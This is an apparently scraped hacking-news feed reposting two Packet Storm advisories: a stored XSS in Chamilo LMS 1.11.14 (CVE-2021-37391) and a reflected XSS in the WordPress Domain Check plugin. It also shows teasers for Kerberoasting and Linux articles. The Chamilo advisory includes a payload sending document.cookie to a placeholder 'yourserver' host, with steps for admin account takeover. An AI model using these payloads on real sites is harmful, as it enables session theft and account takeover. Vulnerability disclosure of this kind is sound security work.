Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Chamilo LMS 1.11.14 Cross Site Scripting / Account Takeover
https://3.bp.blogspot.com/-D44pcoGQpVY/WWlvlv4DR7I/AAAAAAAAIRA/cd0U1aMX9aAjFzK0BP_4B5_C_6s8ROTKQCLcBGAs/s1600/h99.png
Chamilo LMS version 1.11.14 suffers from a persistent cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
Chamilo LMS 1.11.14 Cross Site Scripting / Account Takeover
https://3.bp.blogspot.com/-D44pcoGQpVY/WWlvlv4DR7I/AAAAAAAAIRA/cd0U1aMX9aAjFzK0BP_4B5_C_6s8ROTKQCLcBGAs/s1600/h99.png
Chamilo LMS version 1.11.14 suffers from a persistent cross site scripting vulnerability.
MD5 |
2aec0cc4998138800d8ac868f08ddcb0Download
# Exploit Title: Chamilo LMS 1.11.14 - Account Takeover
# Date: July 21 2021
# Exploit Author: sirpedrotavares
# Vendor Homepage: https://chamilo.org
# Software Link: https://chamilo.org
# Version: Chamilo-lms-1.11.x
# Tested on: Chamilo-lms-1.11.x
# CVE: CVE-2021-37391
#Publication:
https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chamilo-lms-1.11.14-xss-vulnerabilities
Description: A user without privileges in Chamilo LMS 1.11.x can send an
invitation message to another user, e.g., the administrator, through
main/social/search.php,
main/inc/lib/social.lib.php and steal cookies or execute arbitrary code on
the administration side via a stored XSS vulnerability via social network
the send invitation feature. .
CVE ID: CVE-2021-37391
CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N
URL:
https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chamilo-lms-1.11.14-xss-vulnerabilities
Affected parameter: send private message - text field
Payload: x
http://yourserver/?c='+document.cookie>
Steps to reproduce:
1. Navigate to the social network menu
2. Select the victim profile
3. Add the payload on the text field
4. Submit the request and wait for the payload execution
*Impact:* By using this vulnerability, an unprivileged user can steal
cookies from an admin account or force the administrator to create an
account with admin privileges with an HTTP 302 redirect.
*Mitigation*: Update the Chamilo to the latest version.
*Fix*:
https://github.com/chamilo/chamilo-lms/commit/de43a77049771cce08ea7234c5c1510b5af65bc8
Com os meus melhores cumprimentos,
--
*Pedro Tavares*
Founder and Editor-in-Chief at seguranca-informatica.pt
Co-founder of CSIRT.UBI
Creator of 0xSI_f33d <https:
seguranca-informatica.pt | @sirpedrotavares
<https:| 0xSI_f33d
<https:
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
WordPress Domain Check 1.0.16 Cross Site Scripting
https://2.bp.blogspot.com/-trS7d3JOSJY/WWlvYoSx4fI/AAAAAAAAIOo/ua-jTrS9avcHrliD3JJHs9ifWyf14eAUwCLcBGAs/s1600/h57.png
WordPress Domain Check plugin version 1.0.16 suffers from a cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
WordPress Domain Check 1.0.16 Cross Site Scripting
https://2.bp.blogspot.com/-trS7d3JOSJY/WWlvYoSx4fI/AAAAAAAAIOo/ua-jTrS9avcHrliD3JJHs9ifWyf14eAUwCLcBGAs/s1600/h57.png
WordPress Domain Check plugin version 1.0.16 suffers from a cross site scripting vulnerability.
MD5 |
a01b2666a24640021a89c1ff8fe3ec96Download
# Exploit Title: WordPress Plugin Domain Check 1.0.16 - Reflected Cross-Site Scripting (XSS) (Authenticated)
# Date: 30-10-2021
# Exploit Author: Ceylan Bozogullarindan
# Author Webpage: https://bozogullarindan.com
# Vendor Homepage: https://domaincheckplugin.com/
# Software Link: https://wordpress.org/plugins/domain-check/
# Version: 1.0.16
# Tested on: Linux
# CVE: CVE-2021-24926 (https://wpscan.com/vulnerability/8cc7cbbd-f74f-4f30-9483-573641fea733)
# Description:
Domain Check is a Wordpress plugin that allows you to see what domains and SSL certificates are coming up for expiration and to quickly locate the coupons, coupon codes, and deals from your favorite sites before renewing.
An authenticated user is able to inject arbitrary Javascript or HTML code to the "Domain Check Profile" interface available in settings page of the plugin, due to incorrect sanitization of user-supplied data and achieve a Reflected Cross-Site Scripting attack against the administrators. The plugin versions prior to 1.0.16 are affected by this vulnerability.
The details of the discovery are given below.
# Steps To Reproduce:
1. Just visit the following page after signing in the administrator panel: http://vulnerable-wordpress-website/wp-admin/admin.php?page=domain-check-profile&domain=hacked.foo
2. The XSS will be triggered on the settings page.
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Attacking Service Accounts with Kerberoasting
https://cdn-images-1.medium.com/max/2600/1*GQBVXSOlKlomGZzSS6toTQ.jpeg
Forge Service Tickets (TGS) with Kerberoasting MITRE ATT&CK ID: T1558.003, Active HTB machine
Continue reading on R3d Buck3T »
___________________________
@hacking_Attack
@Hacking_Video
Attacking Service Accounts with Kerberoasting
https://cdn-images-1.medium.com/max/2600/1*GQBVXSOlKlomGZzSS6toTQ.jpeg
Forge Service Tickets (TGS) with Kerberoasting MITRE ATT&CK ID: T1558.003, Active HTB machine
Continue reading on R3d Buck3T »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Attacking Service Accounts with Kerberoasting
Forge Service Tickets (TGS) with Kerberoasting MITRE ATT&CK ID: T1558.003
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Linux is everywhere
https://cdn-images-1.medium.com/max/1680/1*8f5AwGh_ph-STKj6HKRfyw.jpeg
First of all linux is a kernel and not an operating system. Operating systems based on linux are a combination of software from GNU and…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Linux is everywhere
https://cdn-images-1.medium.com/max/1680/1*8f5AwGh_ph-STKj6HKRfyw.jpeg
First of all linux is a kernel and not an operating system. Operating systems based on linux are a combination of software from GNU and…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Linux😍 is everywhere
First of all linux is a kernel and not an operating system. Operating systems based on linux are a combination of software from GNU and…